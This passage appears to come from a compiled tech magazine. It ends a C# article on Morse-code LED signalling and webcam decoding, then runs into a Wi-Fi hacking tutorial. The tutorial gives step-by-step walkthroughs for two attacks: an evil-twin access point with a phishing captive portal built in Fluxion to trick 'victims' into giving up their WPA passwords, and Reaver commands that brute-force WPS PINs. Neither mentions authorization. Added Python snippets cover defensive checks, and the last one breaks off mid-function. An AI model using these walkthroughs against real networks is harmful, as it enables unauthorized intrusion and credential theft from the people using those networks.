        {'G', "--."},  {'H', "...."}, {'I', ".."},   {'J', ".---"}, {'K', "-.-"},  {'L', ".-.."},
        {'M', "--"},   {'N', "-."},   {'O', "---"},  {'P', ".--."}, {'Q', "--.-"}, {'R', ".-."},
        {'S', "..."},  {'T', "-"},    {'U', "..-"},  {'V', "...-"}, {'W', ".--"},  {'X', "-..-"},
        {'Y', "-.--"}, {'Z', "--.."}
    };

    // extension to string: "ab c" becomes ".-/-.../ -.-./"
    // '/' separates letters and ' ' separates words, matching what stringToLed expects
    public static string GetMorseCode(this string str)
    {
        var morse = new StringBuilder();
        foreach (char ch in str)
        {
            if (ch == ' ')
                morse.Append(' ');                  // word pause
            else if (Table.TryGetValue(char.ToUpperInvariant(ch), out string code))
                morse.Append(code).Append('/');     // letter followed by the letter pause
            // characters not in the table are dropped
        }
        return morse.ToString();
    }
}

Now, once the Morse code is generated, the program calls a function asynchronously on a different thread to make the LED flash the Morse without hanging the application. I'm using inpout32.dll to control the parallel port; PortInterop is a thin P/Invoke wrapper around its Out32 export, and the inpout32 documentation covers importing the DLL. Below is a code snippet that uses the generated Morse code to flash the LED:

private void stringToLed(string str) // the generated Morse code is the argument
{
    int dotMs = Convert.ToInt16(comboBox1.Text); // "dot": on-time of a dot, from the UI
    int dashMs = dotMs * dmf;                     // "DMF": a dash lasts dot * 3 by default
    int gapMs = imm;                              // "Imm": off-time between the elements of one letter
    // dmf and imm are assumed to be int fields holding the settings described further below;
    // richTextBox1 is updated from this worker thread only for illustration, a real WinForms
    // app must marshal that call to the UI thread with Invoke
    foreach (char ch in str)
    {
        richTextBox1.Text += ch;
        if (ch == '.')
        {
            PortInterop.Output(888, 255);                  // all data pins of LPT1 (0x378) high: LED on
            System.Threading.Thread.Sleep(dotMs);
            PortInterop.Output(888, 0);                    // LED off
            System.Threading.Thread.Sleep(gapMs);
        }
        else if (ch == '-')
        {
            PortInterop.Output(888, 255);
            System.Threading.Thread.Sleep(dashMs);
            PortInterop.Output(888, 0);
            System.Threading.Thread.Sleep(gapMs);
        }
        else if (ch == '/')
        {
            PortInterop.Output(888, 0);                    // letter pause: 3 dots in standard Morse
            System.Threading.Thread.Sleep(Math.Max(0, 3 * dotMs - gapMs));
        }
        else if (ch == ' ')
        {
            PortInterop.Output(888, 0);                    // word pause: 7 dots in standard Morse
            System.Threading.Thread.Sleep(Math.Max(0, 7 * dotMs - gapMs));
        }
    }
}

Webcam and image processing...


To add more fun, I added another feature of decoding this Morse code. The program watches the on/off sequence of
the LED and converts it into English!

Earlier, I was thinking of processing the whole webcam frame and finding the on/ off state of the LED, but this
technique made the application work too slow that it couldn't even differentiate between a dot and a dash. So, I made
an assumption that the camera source will be stationary, and the user will have to define the light source by a mouse
click within the webcam window (see the image below: the point of interception of the two yellow lines is the marker
that defines the light source).

Once the light source is defined, the program can go through the pixels near the defined light source and calculate the
average brightness of each pixel.

using System.Drawing;
Color c = someBitmap.GetPixel(x,y);
float b = c.GetBrightness();

Wow, that's easy! This code was simple to write, and easy to understand. However, unfortunately, it is very slow. If you
use this code, it might take several milliseconds to process, because the GetPixel()/SetPixel() methods are too slow for
iterating through bitmaps. So, in this project, we'll make use of the BitmapData class in GDI+ to access the
information we want. BitmapData only allows us to access the data it stores through a pointer. This means that we'll
have to use the unsafe keyword to scope the block of code that accesses the data. Based on an article by Eric
Gunnerson, here's a class that will perform a very quick unsafe image processing:

using System;
using System.Drawing;
using System.Drawing.Imaging;

public unsafe class UnsafeBitmap : IDisposable
{
    Bitmap bitmap;
    int width;                    // stride: bytes per scan line, including padding
    BitmapData bitmapData = null;
    Byte* pBase = null;

    public UnsafeBitmap(Bitmap bitmap)
    {
        this.bitmap = new Bitmap(bitmap);
    }

    public UnsafeBitmap(int width, int height)
    {
        this.bitmap = new Bitmap(width, height, PixelFormat.Format24bppRgb);
    }

    public void Dispose()
    {
        if (bitmapData != null) UnlockBitmap();
        bitmap.Dispose();
    }

    public Bitmap Bitmap
    {
        get { return bitmap; }
    }

    // 24bpp pixels are stored in memory as B, G, R
    public struct PixelData
    {
        public byte blue;
        public byte green;
        public byte red;
    }

    private Point PixelSize
    {
        get
        {
            GraphicsUnit unit = GraphicsUnit.Pixel;
            RectangleF bounds = bitmap.GetBounds(ref unit);
            return new Point((int)bounds.Width, (int)bounds.Height);
        }
    }

    public void LockBitmap()
    {
        GraphicsUnit unit = GraphicsUnit.Pixel;
        RectangleF boundsF = bitmap.GetBounds(ref unit);
        Rectangle bounds = new Rectangle((int)boundsF.X, (int)boundsF.Y,
                                         (int)boundsF.Width, (int)boundsF.Height);

        bitmapData = bitmap.LockBits(bounds, ImageLockMode.ReadWrite,
                                     PixelFormat.Format24bppRgb);
        // GDI+ pads every scan line to a 4-byte boundary; use the stride it reports
        // instead of recomputing it from the width
        width = bitmapData.Stride;
        pBase = (Byte*)bitmapData.Scan0.ToPointer();
    }

    public PixelData GetPixel(int x, int y)
    {
        PixelData returnValue = *PixelAt(x, y);
        return returnValue;
    }

    public void SetPixel(int x, int y, PixelData colour)
    {
        PixelData* pixel = PixelAt(x, y);
        *pixel = colour;
    }

    public void UnlockBitmap()
    {
        bitmap.UnlockBits(bitmapData);
        bitmapData = null;
        pBase = null;
    }

    // no bounds check: the caller must keep x and y inside the bitmap
    public PixelData* PixelAt(int x, int y)
    {
        return (PixelData*)(pBase + y * width + x * sizeof(PixelData));
    }
}

Be sure to check Eric's article on unsafe image processing. This class can be used for retrieving the red, green, and blue
values of any pixel, as shown below:

// pt is a Point field of the form marking the light source; label19 is a Label on the form.
private void GetBritnessOnce(ref Bitmap image)
{
    // This code is for getting brightness only once !!
    // pt is the point defining the light source
    Rectangle rect = new Rectangle(pt.X - 3, pt.Y - 3, 6, 6);
    // crop the image to this rectangle (rect must lie inside the image, or Clone throws)
    Bitmap img = image.Clone(rect, System.Drawing.Imaging.PixelFormat.Format24bppRgb);
    UnsafeBitmap uBitmap = new UnsafeBitmap(img); // unsafe bitmap class (takes a copy of img)
    uBitmap.LockBitmap();
    float avgBritness = 0;
    for (int x = 0; x < 6; x++)
    {
        for (int y = 0; y < 6; y++)
        {
            UnsafeBitmap.PixelData p = uBitmap.GetPixel(x, y);
            byte red = p.red;
            byte green = p.green;
            byte blue = p.blue;
            // brightness function (luma weights); 1000f keeps the division in floating point
            avgBritness += (299 * red + 587 * green + 114 * blue) / 1000f;
        }
    }
    avgBritness /= 36;   // 6 x 6 pixels
    uBitmap.UnlockBitmap();
    uBitmap.Dispose();
    img.Dispose();
    label19.Text = Convert.ToString(avgBritness);
}

With the brightness value, the program can find whether the light source is "on" or "off", and with a stopwatch, the
timings of on/off sequences could be calculated.

The program provides all the stats below the webcam view, and with these stats, it also predicts the Morse code! Make
sure to watch the video above.

Here, "dot" defines the time span for which the LED will remain on for every dot within the Morse code, and "DMF",
by default, is 3, which means the time span for every dash in the Morse code will be "dot" * 3.

Let's suppose we need to define " ._ " by flashing LEDs. How will we do that?

LED on for "LESS time" --> LED off for "SOME time" --> LED on for "MORE time"

This LED off for "SOME time" is what "Imm" is in the above settings.

Now, let's come to the settings for the decoding part. I'll soon add some AI so that the program will adapt itself after
collecting some on/off data.

For brightness less than the "Brightness Threshold", the light source will be considered "off". For best results, keep
this setting only a little less than the brightness of the light source in "on" state. Similarly, you can play with other
settings to get the best results. The program will provide all the statistics below the webcam window.
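The decoding step described above, written out as an added example; this is not the article's C# program. It turns a stream of brightness samples into on/off runs with the "Brightness Threshold", classifies each run with "dot", "DMF" and "Imm", and looks the result up in a Morse table. The letter gap of 3 * Imm and the word gap of 7 * Imm are the standard Morse ratios and are an assumption here (the text only defines the element gap); the sample stream is constructed by encode_samples, which is also added for testing.

```python
# Added example (not the article's C# program): decode a stream of brightness
# samples from a blinking light into text, using the article's three settings.
# Assumptions: samples arrive at a fixed rate, "dot" is the on-time of a dot in
# samples, "DMF" scales a dash, "Imm" is the off-gap between elements; letter
# gaps of 3*Imm and word gaps of 7*Imm are the standard Morse ratios, assumed
# here because the page only defines the element gap.

MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
}
CODE_FOR = {letter: code for code, letter in MORSE_TABLE.items()}


def encode_samples(text, dot=2, dmf=3, imm=2, on=200.0, off=20.0):
    """Constructed test input: the brightness stream a webcam would see
    (bright value while the LED is on, dark value while it is off)."""
    samples = []
    for wi, word in enumerate(text.upper().split(" ")):
        if wi:
            samples += [off] * (7 * imm)            # word gap
        for li, letter in enumerate(word):
            if li:
                samples += [off] * (3 * imm)        # letter gap
            for ei, element in enumerate(CODE_FOR[letter]):
                if ei:
                    samples += [off] * imm          # element gap ("Imm")
                samples += [on] * (dot if element == "." else dot * dmf)
    return samples


def to_runs(samples, threshold):
    """Apply the "Brightness Threshold" and collapse the on/off states into
    (is_on, length) runs, which is what a stopwatch on the LED would give."""
    runs = []
    for value in samples:
        state = value >= threshold
        if runs and runs[-1][0] == state:
            runs[-1][1] += 1
        else:
            runs.append([state, 1])
    return [(state, length) for state, length in runs]


def decode_runs(runs, dot=2, dmf=3, imm=2):
    """Classify each run by its length against the midpoint between the two
    nearest expected durations, then look each symbol group up in the table."""
    dash_cutoff = dot * (1 + dmf) / 2      # between a dot and a dash
    letter_cutoff = imm * (1 + 3) / 2      # between an element gap and a letter gap
    word_cutoff = imm * (3 + 7) / 2        # between a letter gap and a word gap
    text, symbol = [], ""
    for is_on, length in runs:
        if is_on:
            symbol += "-" if length >= dash_cutoff else "."
            continue
        if length < letter_cutoff:
            continue                       # short gap: still inside one letter
        if symbol:
            text.append(MORSE_TABLE.get(symbol, "?"))
            symbol = ""
        if length >= word_cutoff and text and text[-1] != " ":
            text.append(" ")
    if symbol:                             # flush the last letter
        text.append(MORSE_TABLE.get(symbol, "?"))
    return "".join(text)


def decode(samples, threshold, dot=2, dmf=3, imm=2):
    """Full pipeline: threshold the samples, then decode the runs."""
    return decode_runs(to_runs(samples, threshold), dot, dmf, imm)


if __name__ == "__main__":
    stream = encode_samples("SOS HELP", dot=3, dmf=3, imm=3)
    print(decode(stream, threshold=100, dot=3, dmf=3, imm=3))
```

If the threshold is set above the brightness of the "on" state, every sample reads as off and decode returns an empty string, which is the failure the text warns about when the threshold is not kept just below the light source's "on" brightness.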

We have reached the end of this article, and I hope you enjoyed reading it. Now, here's some homework for you: try
implementing features like AI for the program, and make this program self-adaptive according to its environment. Use
your ideas, and if you end up doing something cool, I'd love to hear about it. :) Have fun!

About the author

Carlos Manzo Trujillo

Carlos Manzo Trujillo grew up in Mexico City (welcome to the jungle people), and frequented the Universidad Nacional Autonoma de Mexico engineering faculty. He spent fifteen years working (slaving away) in different companies (like SAMSUNG and MICROSOFT) where he was recognized with many TOP performance awards. After moving to Sardinia, Italy, (because he was in love with a gorgeous Italian girl) and working briefly as a developer team leader for NAD (he had a cubicle) and a consultant for the International Parliament for Safety and Peace, a non-profit group founded for the defense and protection of peace to all people of the world, and for the security of every nation (he didn't even have a cubicle), he (finally) finished his first IT article (that he'd been writing in his "spare time" for the last three months).

He currently lives in Sardinia (in the same town he got married — how weird is that? nothing weird at all — and where he now feels like he fits in) with his lovely wife and young daughter.


References
1. http://blogs.msdn.com/ericgu/archive/2007/06/20/lost-column-2-unsafe-image-processing.aspx
2. https://www.codeproject.com/Articles/46174/Computer-Vision-Decoding-a-Morse-Code-Flashing-LED
3. http://wwwhome.cs.utwente.nl/~ptdeboer/ham/rscw/algorithm.html
4. https://smallhacks.wordpress.com/2012/04/17/working-with-synology-hardware-devsynobios-and-devttys1/

WIFI HACKING

by Pprasoon Nigam
WIFI Hacking

WIFI hacking has always been a hot topic for hackers (security testers) and techie guys, so let's start gaining a little
knowledge about it.

What is WI-FI?
Wi-Fi or WiFi is a technology for wireless local area networking with devices based on the IEEE 802.11 standards.
802.11 is the "radio frequency" needed to transmit Wi-Fi; it was defined by Vic Hayes, who created the IEEE 802.11
committee. Wi-Fi is a trademark of the Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products
that successfully complete interoperability certification testing.

Devices that can use Wi-Fi technology include personal computers, video-game consoles, smart phones, digital
cameras, tablet computers, digital audio players and modern printers. Wi-Fi compatible devices can connect to the
Internet via a WLAN network and a wireless access point.

What is WIFI-Hacking?
Cracking of wireless networks is the defeating of security devices in wireless local-area networks. Wireless local-area
networks (WLANs), also called Wi-Fi networks, are inherently vulnerable to security lapses that wired networks are
exempt from.

Cracking is a kind of information network attack that is akin to a direct intrusion. There are two basic types of
vulnerabilities associated with WLANs: those caused by poor configuration and those caused by weak encryption.

Detailed Wireless Security Protocols: WEP, WPA, and WPA2


Wireless security protocols were developed to protect home wireless networks. These protocols include:
● WEP
● WPA
● WPA2
Each has its own strengths and weaknesses.

Wired Equivalent Privacy (WEP):


This is the original encryption protocol developed for wireless networks. As its name implies, WEP was designed to
provide the same level of security as wired networks. However, WEP has many well-known security flaws, is difficult
to configure, and is easily broken.

Wi-Fi Protected Access (WPA):


It was introduced as an interim security enhancement over WEP while the 802.11i wireless security standard was
being developed. Most current WPA implementations use a preshared key (PSK), commonly referred to as WPA
Personal, and the Temporal Key Integrity Protocol (TKIP, pronounced tee-kip) for encryption. WPA Enterprise uses
an authentication server to generate keys or certificates.

Wi-Fi Protected Access version 2 (WPA2):

This protocol is based on the 802.11i wireless security standard, which was finalized in 2004. The most significant
enhancement to WPA2 over WPA is the use of the Advanced Encryption Standard (AES) for encryption. The security
provided by AES is sufficient (and approved) for use by the U.S. government to encrypt information classified as top
secret — it’s probably good enough to protect your secrets as well!

About 802.11i
802.11i is a standard for wireless local area networks (WLANs) that provides improved encryption for networks that
use the popular 802.11a, 802.11b (which includes Wi-Fi) and 802.11g standards. The 802.11i standard requires new
encryption key protocols, known as Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard
(AES). The 802.11i standard was officially ratified by the IEEE in June of 2004, and thereby became part of the 802.11
family of wireless network specifications.

Security Modes of Routers

Security Mode                                       Security Rank                  Number of Characters
WEP (Wired Equivalent Protocol)                     Basic                          40/64-bit (10 characters); 128-bit (26 characters)
WPA Personal (Wi-Fi Protected Access Personal)      Strong                         8-63 characters
WPA2 Personal (Wi-Fi Protected Access 2 Personal)   Strongest                      8-63 characters
WPA2/WPA Mixed Mode                                 WPA2: Strongest, WPA: Strong   8-63 characters

Security Issues:
● Weak password
● WPA packet spoofing and decryption
● WPS PIN recovery
● MS-CHAPv2
● Hole196

Detailed Security Issues

● Weak password

Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or
passphrase. To protect against a brute force attack, a truly random passphrase of 20 characters (selected from the set
of 95 permitted characters) is probably sufficient.

Brute forcing of simple passwords can be attempted using the Aircrack Suite starting from the four-way authentication
handshake exchanged during association or periodic re-authentication. To further protect against intrusion, the
network's SSID should not match any entry in the top 1,000 SSIDs as downloadable rainbow tables have been
pre-generated for them and a multitude of common passwords.
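The two defensive points above (a truly random 20-character passphrase, and an SSID that is not on the common lists the precomputed tables were built for) can be checked in code. The example below is added here and is not part of the article; the PSK derivation is the one IEEE 802.11i specifies for WPA/WPA2-Personal (PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output, SSID as salt), the sample passphrases are constructed, and the function names are the author's own.

```python
# Added example (not from the article): estimate how much a passphrase resists
# guessing, generate one from the 95 printable ASCII characters the text
# mentions, and derive the WPA/WPA2 pre-shared key to show why the SSID acts
# as a salt.  The derivation follows IEEE 802.11i; sample inputs are constructed.
import hashlib
import math
import secrets
import string

PRINTABLE_95 = string.ascii_letters + string.digits + string.punctuation + " "

CLASS_SIZES = {                       # pool sizes used for the entropy estimate
    "lower": (string.ascii_lowercase, 26),
    "upper": (string.ascii_uppercase, 26),
    "digit": (string.digits, 10),
    "symbol": (string.punctuation, 32),
    "space": (" ", 1),
}


def entropy_bits(length, pool_size=len(PRINTABLE_95)):
    """Bits of entropy of a uniformly random string of `length` characters."""
    return length * math.log2(pool_size)


def assess(passphrase):
    """Upper bound on the guessing work for a passphrase: its length times the
    log2 of the pool implied by the character classes it actually uses.  A
    dictionary word with substitutions scores far higher than it deserves, so
    treat the figure as a ceiling, not a guarantee."""
    classes = {name for name, (chars, _) in CLASS_SIZES.items()
               if any(c in chars for c in passphrase)}
    pool = sum(CLASS_SIZES[name][1] for name in classes)
    bits = len(passphrase) * math.log2(pool) if pool else 0.0
    return {"length": len(passphrase), "classes": sorted(classes),
            "bits": bits, "recommended_bits": entropy_bits(20)}


def random_passphrase(length=20):
    """A truly random passphrase from the 95-character set, using the OS CSPRNG."""
    return "".join(secrets.choice(PRINTABLE_95) for _ in range(length))


def wpa_psk(passphrase, ssid):
    """WPA/WPA2-Personal PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes).
    Because the SSID is the salt, a precomputed table only helps against the
    SSIDs it was built for, which is the text's point about common SSIDs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32).hex()


if __name__ == "__main__":
    print(assess("summer2017"))                   # constructed weak example
    print(assess(random_passphrase()))
    print(wpa_psk("password", "IEEE"))             # IEEE 802.11i test vector
```

The 4096 PBKDF2 rounds are what make each guess against a captured handshake expensive; they do nothing for a passphrase that is in a wordlist, which is why assess reports a ceiling and the generator exists.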

● WPA packet spoofing and decryption

The most recent and practical attack against WPA is by Mathy Vanhoef and Frank Piessens, who significantly
improved upon the WPA-TKIP attacks of Erik Tews and Martin Beck. They demonstrated how to inject an arbitrary
amount of packets, with each packet containing at most 112 bytes of payload. This was demonstrated by implementing
a port scanner, which can be executed against any client using WPA-TKIP. Additionally, they showed how to decrypt
arbitrary packets sent to a client. They mentioned this can be used to hijack a TCP connection, allowing an attacker to
inject malicious JavaScript when the victim visits a website. In contrast, the Beck-Tews attack could only decrypt short
packets with mostly known content, such as ARP messages, and only allowed injection of 3 to 7 packets of at most 28
bytes. The Beck-Tews attack also requires Quality of Service (as defined in 802.11e) to be enabled, while the
Vanhoef-Piessens attack does not. Neither attack leads to recovery of the shared session key between the client
and Access Point. The authors say using a short rekeying interval can prevent some attacks but not all, and strongly
recommend switching from TKIP to AES-based CCMP.

The vulnerabilities of TKIP are significant in that WPA-TKIP had been held to be an extremely safe combination;
indeed, WPA-TKIP is still a configuration option upon a wide variety of wireless routing devices provided by many
hardware vendors. A survey in 2013 showed that 71% still allow usage of WPA, and 19% exclusively support WPA.

● WPS PIN recovery

A more serious security flaw was revealed in December 2011 by Stefan Viehbock that affects wireless routers with the
Wi-Fi Protected Setup (WPS) feature, regardless of which encryption method they use. Most recent models have this
feature and enable it by default. Many consumer Wi-Fi device manufacturers had taken steps to eliminate the
potential of weak passphrase choices by promoting alternative methods of automatically generating and distributing
strong keys when users add a new wireless adapter or appliance to a network. These methods include pushing buttons
on the devices or entering an 8-digit PIN.

The Wi-Fi Alliance standardized these methods as Wi-Fi Protected Setup; however, the PIN feature, as widely
implemented, introduced a major new security flaw. The flaw allows a remote attacker to recover the WPS PIN and,
with it, the router's WPA/WPA2 password in a few hours. Users have been urged to turn off the WPS feature, although
this may not be possible on some router models. Also note that the PIN is written on a label on most Wi-Fi routers
with WPS, and cannot be changed if compromised.

● MS-CHAPv2

Several weaknesses have been found in MS-CHAPv2, some of which severely reduce the complexity of brute-force
attacks, making them feasible with modern hardware. In 2012, the complexity of breaking MS-CHAPv2 was reduced
to that of breaking a single DES key, in work by Moxie Marlinspike and Marsh Ray. Moxie advised: "Enterprises who are
depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers
should immediately start migrating to something else."

● Hole196
Hole196 is a vulnerability in the WPA2 protocol that abuses the shared Group Temporal Key (GTK). It can be used to
conduct man-in-the-middle and denial-of-service attacks. However, it assumes that the attacker is already
authenticated against the Access Point and thus in possession of the GTK.

LET'S GET OUR HANDS/SYSTEM WORKING

WIFI H@ck!ng with “Fluxion”


This article will introduce a new cracking method, a script known as "Fluxion".

Tools Needed for H@ck!ng


● OS: Kali Linux
● Smart phone: Android/IOS
● Tool/Script Fluxion
● Most Important: Patience and Practice

What is Fluxion?
Fluxion is nothing but an advanced script to crack Wi-Fi passphrases. It's based on another script called "linset" (actually
it's not much different from linset; think of it as an improvement, with some bug fixes and additional options), using
something like a man in the middle attack/evil twin attack to get the WPA password instead of going the
brute-force/dictionary route.

How it works:
● Scan the networks.
● Capture handshake (can't be used without a valid handshake, it's necessary to verify the password)
● Use WEB Interface
● Launches a FakeAP instance imitating the original access point
● A DHCP server is launched in FakeAP network
● Spawns a MDK3 process, which de-authenticates all users connected to the target network, so they can be made
to connect to the FakeAP and enter the WPA password.
● A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the
script
● A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
● Each submitted password is verified against the handshake captured earlier
● The attack will automatically terminate once correct password is submitted

Installation of Fluxion
As Kali Linux doesn't have this tool pre-installed, installation is the first step.
Link to download Fluxion:
https://github.com/wi-fi-analyzer/fluxion
or
https://github.com/Hacker-Inside007/fluxion
(or search as per your compatibility)

Steps for Installation

1. Create a folder "fluxion" and save the fluxion script (downloaded from the links given above)
2. Navigate to the folder
➡ Command : cd fluxion (or the name you have given the folder)
3. Run the script

Figure 1: "./fluxion" command entered in terminal

➡ Command : ./fluxion or sudo ./fluxion

4. If by any chance you get a permission error, change the permissions
➡ Command : chmod 755 fluxion (then try running the script again)
5. If you get any dependency errors or warnings, try running the installer script
➡ Command : ./installer.sh or sudo ./installer.sh

Figure 2: "installer.sh" installs all the dependencies and scripts into your Kali OS

6. When everything is installed fine, open fluxion

➡ Command : ./fluxion or sudo ./fluxion

Figure 3: Main page of the Fluxion script

Now H@cK!nG Begins


Steps for hacking Wi-Fi password or passphrase

Step 1: As the main page welcomes you, it will ask to select language "English" (Please select language as per your
compatibility).


Step 2: Select your interface (it will be option "1"). As soon as you select your interface, the scanning process starts
(a terminal will open and close after 10 seconds) and it will show the WIFI list.

Figure 4: Selecting interface to start monitoring WIFI signals with BSSID and ESSID

Step 3: Choose the WIFI (#> ID, i.e. any WIFI ID from the list).

Figure 5: WIFI list with their BSSID (MAC) and ESSID

Step 4: Choose option "1" (FakeAP – Hostapd).


Figure 6: Selecting option 1 “FakeAP”

Step 5: Now we will capture the handshake, so press "Enter".

Figure 7: Press “Enter” to start WPA Handshake

Step 6: Select option "1" (aircrack-ng) to capture the handshake (till you get "WPA handshake").

Figure 8: Select option “1” (aircrack-ng) for checking the handshake



Figure 9: As there is “No” handshake with the WIFI router, will start “Deauth all” for WPA handshake

Note: When “Handshake” has been captured, then select option “1” (check handshake)

Step 7: Use option "1" (Web Interface), it will offer Login pages in different languages

Figure 10: WPA handshake successfully done


Figure 11: Select Option “1”(Web Interface) for selecting language

Figure 12: Select option ”1” for creating fake login page in “English” and it will send it to the victim

Note: It's kind of a “phish” page, which is used to trick the victim.

After selecting the option for the login page, you will see multiple windows popping up: DHCP and DNS requests being
made, a "status reporting window", and the deauth window.

Note: It’s basically getting victims off the actual AP to fake AP.


Now, in the smartphone, you will see two networks with the same name. Here is the part where the attacker has to get
lucky. If the victim opens the fake AP (the open network), they will get a fake login page for the wireless network. On
clicking, a page will open and ask for a "Password". As soon as the victim enters the password of the WIFI (believing
they are entering the passphrase of their own WIFI) and clicks the "Submit" button, voilllaaaaa!!!! The password or
passphrase appears on the screen.
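Seen from the defender's side, the tell-tale of the evil twin described in "How it works" and in the paragraph above is an open network that advertises the same name as your encrypted one from a radio you do not own. The check below is an added example, not part of the article or of Fluxion: the scan rows are constructed, the column set (BSSID, channel, encryption, ESSID) follows an airodump-ng style listing but the exact export format is an assumption, and KNOWN_APS stands for the radios you actually operate.

```python
# Added example (not from the article or from Fluxion): flag the "two networks
# with the same name" situation from a wireless scan.  Scan rows are constructed;
# the column layout is modelled on an airodump-ng listing but is an assumption.
from collections import defaultdict

SCAN_CSV = """\
BSSID,CH,ENC,ESSID
AA:BB:CC:00:11:22,6,WPA2,HomeNet
AA:BB:CC:00:11:23,11,WPA2,HomeNet
DE:AD:BE:EF:00:01,6,OPN,HomeNet
10:20:30:40:50:60,1,WPA2,CoffeeShop
"""

# Radios you own, per network name (constructed; e.g. two mesh nodes).
KNOWN_APS = {"HomeNet": {"AA:BB:CC:00:11:22", "AA:BB:CC:00:11:23"}}


def parse_scan(text):
    """Split the header-prefixed CSV listing into one dict per access point."""
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    return [dict(zip(header, line.split(","))) for line in lines[1:]]


def find_suspects(rows, known_aps):
    """Return (BSSID, ESSID, reasons) for every access point that is either an
    unexpected radio for a name you own, or an open network advertising the
    same name as an encrypted one (the captive-portal pattern described above)."""
    by_essid = defaultdict(list)
    for row in rows:
        by_essid[row["ESSID"]].append(row)
    findings = []
    for essid, aps in by_essid.items():
        encryptions = {ap["ENC"] for ap in aps}
        for ap in aps:
            reasons = []
            if essid in known_aps and ap["BSSID"].upper() not in known_aps[essid]:
                reasons.append("BSSID is not one of the radios for this ESSID")
            if ap["ENC"] == "OPN" and encryptions - {"OPN"}:
                reasons.append("open network sharing its ESSID with an encrypted one")
            if reasons:
                findings.append((ap["BSSID"], essid, reasons))
    return findings


if __name__ == "__main__":
    for bssid, essid, reasons in find_suspects(parse_scan(SCAN_CSV), KNOWN_APS):
        print(f"{bssid} ({essid}): " + "; ".join(reasons))
```

Two radios with the same ESSID on different channels are normal for a multi-node network, so the check keys on ownership and on the encryption mismatch rather than on duplicate names alone.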

Figure 13: Password appears after clicking “Submit” button

Figure 14: Fake login page will appear in browser as soon as victim selects the “FakeAP” in their smart
phones

WIFI H@ck!ng with “Reaver”

What is Reaver?
Reaver is an open source tool that brute forces WPS (Wifi Protected Setup). This is the pin (usually printed on the
bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a
password. With enough time, Reaver can crack this pin and reveal the WPA or WPA2 password.

What is WPS (Wifi Protected Setup)?


WPS stands for Wi-Fi Protected Setup and it is a wireless networking standard that tries to make connections between
a router and wireless devices faster and easier. It works only for wireless networks that have WPA Personal or WPA2
Personal security. WPS doesn't provide support for wireless networks using the deprecated WEP security.
Why are WPS pins vulnerable? Have a look at this paper =>
https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

How does it work?


Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn't
been pressed on the access point.
Reaver exploits the PIN code, which then reveals the password.

Tools Needed for H@ck!ng


• OS: Kali Linux
• Tool/Script: Reaver
• Most Important: Patience and Practice

Now H@cK!nG begins

Steps for hacking WIFI password or passphrase

Step 1: Open terminal and check your WIFI interface.


➡ Command: airmon-ng

Figure 15: Checking Wireless Interface

Step 2: Start Monitoring mode of the interface.


➡ Command: airmon-ng start wlan0


Figure 16: Starting Monitoring of wireless interface

As we can see, many PIDs (process IDs) are running, which can interfere with our hacking, so let's kill them.

Figure 17: PIDs are running

Step 3: Kill all process IDs.

➡ Command: kill (type all PIDs) for example: kill 2646 2750 and hit "Enter".
Step 4: Now check whether the routers have their WPS locked or not.
➡ Command : wash -i mon0


Figure 18: Checking WPS PIN is locked or NOT

Step 5: Start Reaver to attack the WIFI router, brute-forcing the WPS pin and getting the password.
➡ Command: reaver -i mon0 -b [BSSID goes here] -d 30 -S -N -c 6 -vv

Figure 19: Reaver command for starting wifi hacking

Note: The time needed to crack or retrieve the passphrase varies from system to system and with the signal strength.

Sit back and have some coffee; "Reaver" will do its work and present you with the passphrase.
Here we go with the passphrase or password of the WIFI router.
OK, so here we go with two good tools for WIFI hacking.


Figure 20: WIFI Password has been HACKED.

Prevention of WIFI getting hacked


It's not always true that WIFI can be hacked; we can make sure it is protected with a few small things.

A simple method:
CHECK YOUR WIRELESS ROUTER LIGHTS
Your wireless router should have indicator lights that show Internet connectivity, hardwired network connections, and
also any wireless activity, so one way you can see if anyone's using your network is to shut down all wireless devices
and go see if that wireless light is still blinking.

Second method:
CHECK YOUR WIRELESS ROUTER DEVICE LIST
Your router's administrative console can help you find out more about your wireless network activity and change your
security settings. Go to your device list; it should provide a list of IP addresses, MAC addresses, and device names (if
detectable) that you can check against. Compare the connected devices to your gear to find any unwanted users.
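The device-list comparison above is easy to script once the router's export is in hand. The code below is an added example and not from the article: the lease lines are constructed and follow a dnsmasq-style "expiry mac ip hostname" layout, which is an assumption (every router exports differently), and MY_DEVICES stands for the MAC addresses of the gear you own. It also flags addresses with the locally-administered bit set, since phones that randomize their MAC show up as "unknown" even when they are yours.

```python
# Added example (not from the article): the "compare the connected devices to
# your gear" check as code.  Lease lines are constructed; the dnsmasq-style
# "expiry mac ip hostname" layout is an assumption, your router's export differs.
import re

LEASES = """\
1700000000 a4:5e:60:12:34:56 192.168.1.10 living-room-tv
1700000100 3C-22-FB-AA-BB-CC 192.168.1.11 android-phone
1700000200 DA:1B:2C:3D:4E:5F 192.168.1.12 *
1700000300 00:11:22:33:44:55 192.168.1.13 unknown-laptop
"""

MY_DEVICES = {"A4:5E:60:12:34:56", "3c22.fbaa.bbcc"}   # any common MAC notation


def normalize_mac(mac):
    """Canonical AA:BB:CC:DD:EE:FF form from colon, dash or dotted notation."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2)).upper()


def is_locally_administered(mac):
    """Bit 1 of the first octet set means the address was not assigned by a
    vendor; modern phones use such randomized MACs, so an unknown entry with
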